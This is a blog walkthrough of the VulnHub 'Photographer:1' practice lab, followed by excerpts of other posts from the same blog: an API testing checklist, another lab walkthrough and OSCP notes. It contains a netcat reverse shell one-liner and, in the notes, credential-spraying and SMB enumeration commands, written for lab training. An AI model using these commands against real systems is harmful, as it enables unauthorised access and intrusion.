Photographer:1 Walkthrough - Vulhnub

By -
This machine was developed to prepare for OSCP. It is boot2root challenge. Let's begin!

Target IP: 10.0.2.11

1. Results of nmap scan.
2. We noticed that on port 80 and 8000 http service is running. Also on 445 Samba smbd.

3. Let's visit port 80.
4. After performing directory fuzzing we didn't find anything sensitive. It's time to explore next port which is port 8000. At the bottom of the page it's disclosing the CMS name which is Koken. Koken CMS is vulnerable to Authenticated RCE. But in order to exploit it, we will require admin credentials.

5. Wfuzz gave us /admin/ directory through which we can login. Still creds required :(

6. Now we can connect to smb share on port 445. After connecting on port 445 we noticed two files.

7. mailsent.txt file reveals user Daisa's email address and indicating a secret "babygirl" which can be used as a password to login into Koken application.

8. Success! Now we can login into Koken admin panel. After browsing to Console section we notived version 0.22.24 which is vulnerable to RCE.
9.  After successful exploitation you will get a shell.

10. Use following one liner to receive a reverse shell on your system.
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f



11. We can read user.txt now!

12. Running LinEnum.sh reveals that SUID bit set for php


13. Used GTFOBins for reference.

14. Rooted successfully!!!!
Thanks for reading! 😄

Comments

Post a Comment

Popular posts from this blog

API Testing Checklist

By -
Checkpoints: 1. Older APIs versions tend to be more vulnerable and they lack security mechanisms. Leverage the predictable nature of REST APIs to find old versions. Saw a call to 'api/v3/login'? Check if 'api/v1/login' exists as well. It might be more vulnerable. 2. Never assume there’s only one way to authenticate to an API! Modern apps have many API endpoints for AuthN: `/api/mobile/login` | `/api/v3/login` | `/api/magic_link`; etc. Find and test all of them for AuthN problems. 3. Remember how SQL Injections used to be extremely common 5-10 years ago, and you could break into almost every company? BOLA (IDOR) is the new epidemic of API security. 4. Testing a Ruby on Rails App & noticed an HTTP parameter containing a URL? Developers sometimes use "Kernel#open" function to access URLs == Game Over. Just send a pipe as the first character and then a shell command (Command Injection by design) Reference Link: https://apidock.com/ruby/Kernel/open 5. Found SSR
Read more

THE PLANETS: MERCURY Walkthrough - VulnHub

By -
Image
Introduction Getting back to CTF solving after a looong break, is a difficult task. So, I decided to proceed with an EASY challenge, and  VulnHub  was the obvious choice to find the one. In few searches, I found a perfect machine to start with -  'The Planets: Mercury' .   This boot2root machine had 2 flags: USER & ROOT. The USER flag can be obtained by  SQLi  ==>  Creds  ==>  SSH  ==>  FLAG . The ROOT flag is were an interesting PrivEsc lie in. Hope you find this writeup interesting & useful! Information Gathering Port Scan: Nmap To begin with reconnaissance, let's find out open ports with Nmap, with service version enumerations: Port 8080 So this looks like a simple page with no secrete or hint. Let's try accessing some common directories: Visiting ' admin ' directory, we got the error page. This happened as the site is built on  Django  with  Debug  set to  True . Luckily for us, the URL Configuration is being reflected on error page. Let'
Read more

OSCP - Personal Notes

By -
Image
  Hey Guys, in this post I am just going to copy paste my notes which I collected during my OSCP journey from different sources. Feel free to collaborate. 💀 [*] SSH - 22 Tunneling ssh -L 8443:127.0.0.1:8443 user@x.x.x.x Credentials Spraying ncrack -U users.txt -P pass.txt ssh://x.x.x.x [*] DNS - 53 Perform DNS Zone Transfer check dig axfr x.x.x.x dig axfr vhost.com @x.x.x.x  [*] TCPDUMP tcpdump -i eth0 icmp [*] SMB 1. SMB Protocol enumeration: nmap -p445 --script smb-protocols x.x.x.x 2. Check for SMB Vulnerability nmap --script smb-vuln* x.x.x.x 3. Get a list of shares available on a host smbclient -L x.x.x.x 4. Connect to the share smbclient //x.x.x.x/Share_Name 5. SMBMap for checking access on fileshares smbmap -H x.x.x.x -u Username -p Password or smbmap -u '' -p '' -d 'htb.local' -H x.x.x.x 6. Download all files in shares: smbget -R smb://x.x.x.x/Share -U Username 7. Use crackmapexec for spraying crackmapexec smb 10.10.10.175 -u Users.txt -p Pass.txt --co
Read more